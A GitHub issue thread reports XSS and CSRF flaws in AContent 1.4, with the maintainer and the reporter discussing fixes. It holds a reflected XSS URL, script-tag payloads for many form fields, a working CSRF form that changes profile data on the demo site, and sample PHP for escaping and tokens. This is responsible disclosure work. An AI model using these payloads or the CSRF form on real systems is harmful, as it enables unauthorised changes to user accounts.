XSS and CSRF issues on v1.4
Hello... I have found XSS and CSRF issues in atutor/AContent v1.4. I used the AContent 1.4 Demo on your official website. Please let me know if you need additional information. I hope this is the right channel to disclose security issues, because you requested that any bugs be posted to this GitHub page. Regards.
Findings
XSS (Reflected)
https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>
XSS (Stored)
1 (editor/edit_content_folder.php)
- In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
- Please click Delete Content Icon to trigger the JS alert
2 (editor/edit_content.php)
- In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
- Please click Delete Content Icon to trigger the JS alert
3 (editor/edit_content.php)
- In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
- In the Body, please enter <script>alert(document.domain)</script>
- Click Preview Button to trigger the JS alert
- Click Save Button
- Click <script>test</script> to trigger the JS alert again
4 (tests/edit_test.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
5 (tests/edit_question_likert.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Preview or Delete Button
- Every time we are on the Question Bank (tests/question_db.php), the JS alert is also triggered
6 (tests/create_question_matchingdd.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
7 (tests/create_question_matching.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
8 (tests/create_question_multianswer.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
9 (tests/create_question_multichoice.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
10 (tests/create_question_long.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
11 (tests/edit_question_ordering.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
12 (tests/edit_question_truefalse.php)
- In the Statement Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Preview or Delete Button
13 (tests/question_cats_manage.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Press Enter or click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Delete Button
14 (course/course_property.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Press Enter or click Save Button to trigger the JS alert
CSRF
- Log in at the official website.
- Save HTML code below and give it a name, e.g. CSRF_Payload.html.
- Open and execute the payload on the same browser by clicking the CLICK ME Button
<html>
<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
<input name="password_error" type="hidden">
<input type="hidden" name="form_password_hidden" value="">
<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
<!-- Click the button to execute this CSRF Payload -->
<input type="submit" name="submit" value="CLICK ME" class="submit">
</form>
</html>
Suggested Mitigations
- For the XSS issues, we can use input validation and an escape function for all user-supplied inputs. I see you made special characters become like <script>alert(document.domain)</script> in certain places, but not in many other places, and therefore they are still vulnerable to XSS.
- For the CSRF issue, we can use a CSRF Token. It would be better if Change Password and Change Email Address also used a CSRF Token.
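The two mitigations the report asks for, as an added PHP illustration (this is not AContent's code and not the reporter's pull request; the function names `esc_html`, `csrf_token`, `csrf_field` and `csrf_verify` are hypothetical). It escapes a stored title such as the one from finding 1 before rendering, so the browser shows the literal text instead of running it, and it ties every state-changing form to a per-session token so a cross-site POST like the profile form above, which carries no token, is rejected.

```php
<?php
// Added illustration (not AContent's code, not the reporter's pull request).
// Shows context-aware output escaping for fields like the titles/questions listed
// above, and a per-session CSRF token for the profile form. Names are hypothetical.

declare(strict_types=1);

/** Escape a user-supplied string for HTML text or attribute context (UTF-8). */
function esc_html(string $value): string
{
    // ENT_QUOTES also escapes ' and " so the value is safe inside attributes.
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 32 random bytes from the CSPRNG, hex-encoded for safe embedding.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to embed in every state-changing form (profile, password, email). */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="' . esc_html(csrf_token()) . '">';
}

/** Verify the submitted token; a cross-site POST has no way to obtain it. */
function csrf_verify(array $post): bool
{
    $submitted = $post['csrf_token'] ?? '';
    if (!is_string($submitted) || $submitted === '') {
        return false;
    }
    // hash_equals compares in constant time, so timing does not leak the token.
    return hash_equals(csrf_token(), $submitted);
}

// --- Usage in a profile handler (constructed sample) ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // ... validate and save first_name, last_name, etc. here ...
}

// --- Rendering: the stored value is escaped on output, never echoed raw ---
$title = '<script>alert(document.domain)</script>';   // constructed sample value
echo '<form method="post" action="/acontent/profile/index.php">';
echo csrf_field();
echo '<input name="first_name" value="' . esc_html($title) . '">';
echo '</form>';
```

With this in place the sample title renders as `&lt;script&gt;alert(document.domain)&lt;/script&gt;` in the page source, and the same `csrf_verify` check belongs in the Change Password and Change Email Address handlers the reporter mentions, not only in the profile form. Marking the session cookie `SameSite=Lax` is a complementary, browser-enforced layer, but it does not replace the token check.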
This application is no longer being maintained, though we will accept pull requests to address these issues.
Hi, thank you for your response. I have forked your work to help address these issues. I will make a pull request later. Regards.
Will watch for your pull requests. Thx
Hello.., I have just made a pull request. I have added a new folder called protection, which contains a third-party class or library to prevent XSS and CSRF. By the way, I cannot access the edit test and question features because of TR_ERROR_NO_ITEM_FOUND, so I cannot reproduce numbers 4, 5, 11, and 12 for Stored XSS above. Anyway, I have updated the files related to them, like the create question feature. Some warning messages may still appear and I am still looking for the root cause. Regards.